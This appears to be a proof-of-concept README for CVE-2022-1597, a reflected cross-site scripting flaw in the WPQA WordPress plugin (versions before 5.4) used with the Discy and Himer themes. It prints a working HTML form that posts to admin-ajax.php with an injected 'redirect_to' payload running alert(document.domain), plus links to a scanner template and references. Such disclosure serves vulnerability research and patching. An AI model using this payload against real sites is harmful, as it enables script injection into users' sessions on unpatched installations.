
CVE-2022-1597 PoC: WordPress plugin WPQA Cross-Site Scripting Vulnerability

Associated Vulnerability
Title: WordPress plugin WPQA Cross-Site Scripting Vulnerability (CVE-2022-1597)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP; it lets a personal blog be hosted on a server running PHP and MySQL. A WordPress plugin is an add-on application for the platform. Versions of the WordPress plugin WPQA before 5.4 contain a cross-site scripting vulnerability, caused by the plugin failing to sanitise and escape a parameter of its reset-password form. An attacker can exploit this flaw to carry out cross-site scripting attacks.
Readme
# CVE-2022-1597
The plugin, used as a companion for the Discy and Himer themes, does not sanitise and escape the `redirect_to` parameter of its reset-password form (handled by the `wpqa_ajax_password_process` AJAX action), which makes it possible to perform Reflected Cross-Site Scripting attacks.

## Affected Plugins:
[WPQA](https://codecanyon.net/item/wpqa-builder-forms-addon-for-wordpress/25298161) < 5.4

## Affected Themes:
[DISCY](https://2code.info/discy-social-questions-and-answers-wordpress-theme/)

[HIMER](https://2code.info/himer-social-questions-and-answers-wordpress-theme/)

## POC:

```html
<html>
  <body>
  <!-- Hides the attacker page's real path in the address bar -->
  <script>history.pushState('', '', '/')</script>
    <!-- Replace http://localhost with the target WordPress host -->
    <form action="http://localhost/wp-admin/admin-ajax.php" method="POST">
      <!-- user_mail must belong to an existing account so the handler proceeds -->
      <input type="hidden" name="user&#95;mail" value="validEmail@domain.com" />
      <!-- form_type and action select the WPQA reset-password AJAX handler -->
      <input type="hidden" name="form&#95;type" value="wpqa&#95;forget" />
      <input type="hidden" name="action" value="wpqa&#95;ajax&#95;password&#95;process" />
      <!-- redirect_to is reflected unescaped: the value closes the attribute
           and injects an img element whose onerror handler runs the script -->
      <input type="hidden" name="redirect&#95;to" value="&quot;&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;document&#46;domain&#41;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
## Nuclei Template:
[CVE-2022-1597.yaml](CVE-2022-1597.yaml)

![NUCLEI](files/photo.png)

## VIDEO POC:
https://www.youtube.com/watch?v=E2GRtf6prq8

### References:
https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1597
File Snapshot

```
/data/pocs/66065d06940f84a6799bf164b569779192c27945   (4.0K)
├── CVE-2022-1597.yaml   (1.8K)
├── files                (4.0K)
│   └── photo.png        (1.4M)
└── README.md            (1.4K)

1 directory, 3 files
```